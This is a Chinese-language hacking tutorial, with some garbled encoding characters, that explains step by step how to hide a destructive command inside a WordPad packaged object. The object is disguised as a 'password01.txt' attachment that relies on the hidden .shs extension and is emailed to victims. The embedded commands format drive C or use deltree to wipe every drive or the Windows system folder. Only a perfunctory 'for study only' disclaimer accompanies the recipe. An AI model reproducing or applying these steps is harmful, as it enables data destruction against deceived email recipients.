|
下面我就將改良后的TXT炸彈的制作方法教給大家:
1.創(chuàng)建一個只包含一個空格(為了減小文件體積)的文本文件�����,任意取名�����。
2.打開{寫字板文檔}����,將此文件拖放入{寫字板文檔}。也可以點擊記{寫字板文檔}單欄中的“插入\對象”�����,彈出“插入對象”對話框��,選中“從文件創(chuàng)建”�����,然后點擊“瀏覽”按鈕選擇要插入的文件����。
3.選中該插入對象的圖標,選擇菜單欄中的“編輯\包對象\編輯包”(如圖1)�。在彈出的“對象包裝程序”對話框中,選擇菜單欄中的“編輯\命令行”���,然后輸入如下命令:start.exe /m format c:/q /autotest /u ���,點擊“確定”,此時��,內(nèi)容欄中會顯示出命令內(nèi)容�。
4.點擊外觀欄中的“插入圖標”按鈕,會彈出一個警告對話框���,確認��,然后任選一個圖標���。 5.選擇菜單欄中的“編輯\卷標”�����,為此嵌入對象取一個名稱(會替換原來的文件名稱)�����。點擊“文件”菜單中的“更新”�,然后關閉此對話框�����。
6.將剛剛建立的嵌入對象拖放到桌面上�。文件的默認名是“碎片”(在2000下的默認名為"片段"),現(xiàn)在我們把它改成“password01.txt”�。打開電子郵件程序?qū)⒆烂嫔系?#8220;password01.txt”作為附件發(fā)出,或者將含有嵌入對象(帶有惡意命令)的文檔作為附件發(fā)出�����。
7.當郵件接收者誤將“password01.txt.shs”文件作為“password01.txt”(如前文所述,“.SHS”擴展名永遠是隱藏的)放心地打開時����,或打開文件,點擊文件中的嵌入對象時觸發(fā)惡意命令(彈出DOS運行窗口�����,執(zhí)行格式化命令).如果將上面的命令替換為:start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 則是將刪除對方硬盤下所有文件(盤符根據(jù)實際情況自定義)���;如果替換為:start.exe /m deltree /y c:\windows\system\*.* 則是刪除對方c:\windows\system\目錄底下的所有文件.(當然大家可以改成其它的命令) 真的很簡單,就這樣一個惡意的攻擊程序被弄出來了�����,太可怕了�����! 為了方便大家的學習與研究大家可以在黑白網(wǎng)絡下載上面的三個程序.(切記:僅供學習與研究�,切莫用來攻擊他人,更不要在沒有安全準備的情況下執(zhí)行上面的文件��,呵呵?��。?
|
